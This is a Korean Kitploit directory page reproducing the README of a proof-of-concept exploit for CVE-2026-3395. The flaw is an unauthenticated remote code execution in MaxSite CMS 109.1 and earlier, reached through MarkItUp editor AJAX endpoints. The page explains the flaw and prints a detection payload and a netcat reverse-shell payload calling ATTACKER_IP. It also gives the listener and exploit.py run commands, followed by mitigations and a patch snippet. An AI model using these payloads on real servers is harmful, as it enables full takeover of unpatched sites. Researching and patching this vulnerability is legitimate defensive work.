Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE — MaxSite CMS <= 109.1의 MarkItUp 에디터 AJAX 엔드포인트를 통한 인증되지 않은 원격 코드 실행에 대한 개념 증명 익스플로잇으로, 탐지 및 리버스 셸 페이로드를 포함합니다. | Kitploit
도구/GitHubGitHub/mbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubmbanyamer/cve-2026-3395-maxsite-cms-unauthenticated-rce

CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE

MaxSite CMS <= 109.1의 MarkItUp 에디터 AJAX 엔드포인트를 통한 인증되지 않은 원격 코드 실행에 대한 개념 증명 익스플로잇으로, 탐지 및 리버스 셸 페이로드를 포함합니다.

저장소 보기
55개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE‑2026‑3395 — MaxSite CMS 인증되지 않은 원격 코드 실행

Author Country Instagram GitHub CVE Exploit Type CVSS

개요

MaxSite CMS ≤ 109.1에서 발견된 인증되지 않은 원격 코드 실행(RCE) 취약점입니다.

이 결함은 MarkItUp 편집기 플러그인의 AJAX 엔드포인트에서 약한 권한 검사와 run_php 플러그인이 사용자 제공 PHP 코드를 안전하지 않게 실행하는 것이 결합되어 발생합니다.

  • 발견/수정: 2026년 3월
  • 패치 버전: MaxSite CMS 109.2
  • 공급업체: MaxSite CMS
  • 저장소: maxsite/cms

설명

이 취약점은 MarkItUp 편집기 플러그인의 다음 파일에 영향을 미칩니다:

  • preview-ajax.php
  • autosave-post-ajax.php

이 엔드포인트는:

  • 인증 없이 접근 가능
  • 약한 리퍼러 검증만 수행(쉽게 우회 가능)
  • 사용자 입력을 run_php 플러그인에 전달
  • eval()을 사용하여 [php]...[/php] 숏코드 실행

공격자는 /ajax/ 경로에 Base64로 인코딩된 내부 경로와 악성 PHP 페이로드를 data 매개변수에 포함한 조작된 POST 요청을 보낼 수 있으며, 그 결과는 다음과 같습니다:

🚨 완전한 인증 없는 원격 코드 실행


공격 흐름 다이어그램

root@kitploit:~
graph TD
    A["Attacker"] -->|"Malicious POST Request"| B["AJAX Endpoint"]
    B -->|"Referer Spoofing"| C["preview-ajax.php"]
    C -->|"Unsanitized Input"| D["run_php Plugin"]
    D -->|"eval() Execution"| E["Arbitrary PHP Execution"]
    E -->|"Command Execution"| F["Compromised Server"]

사전 요구 사항

  • MaxSite CMS 버전 ≤ 109.1
  • run_php 플러그인 활성화(일반적인 기본값)
  • eval()을 허용하는 PHP 구성

악용

Python 3 개념 증명 익스플로잇(exploit.py)이 포함되어 있습니다.

탐지 페이로드(비파괴적)

root@kitploit:~
[php]echo 'RCE CONFIRMED - ' . phpversion();[/php]

리버스 셸 페이로드

root@kitploit:~
[php]system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP ATTACKER_PORT >/tmp/f');[/php]

사용 방법

1. 리스너 시작

root@kitploit:~
nc -lvnp 9001

2. 익스플로잇 실행

root@kitploit:~
python3 exploit.py http://target.com --lhost 10.10.14.22 --lport 9001

완화 조치

즉시 조치

  • MaxSite CMS 109.2 이상으로 업그레이드
  • 필요하지 않은 경우 run_php 플러그인 비활성화

수동 패치

취약한 파일에 인증 검사를 추가합니다:

root@kitploit:~
if (!is_login()) {
    die('Access denied');
}
mso_checkreferer();

참고 자료

  • 패치 커밋 https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3

  • 취약점 항목 https://vuldb.com/?id.348281

  • NVD 기록 https://nvd.nist.gov/vuln/detail/CVE-2026-3395


법적 고지

이 프로젝트는 다음을 위해 제공됩니다:

  • 보안 연구
  • 교육 목적
  • 승인된 침투 테스트

⚠️ 명시적 허가 없이 시스템에 사용하지 마십시오.

저자는 오용이나 손해에 대해 책임을 지지 않습니다.


작성자

Mohammed Idrees Banyamer 요르단 🇯🇴 보안 연구원

banyamer_security — Silent Hunter • Shadow Presence

2026년 3월

도구 다운로드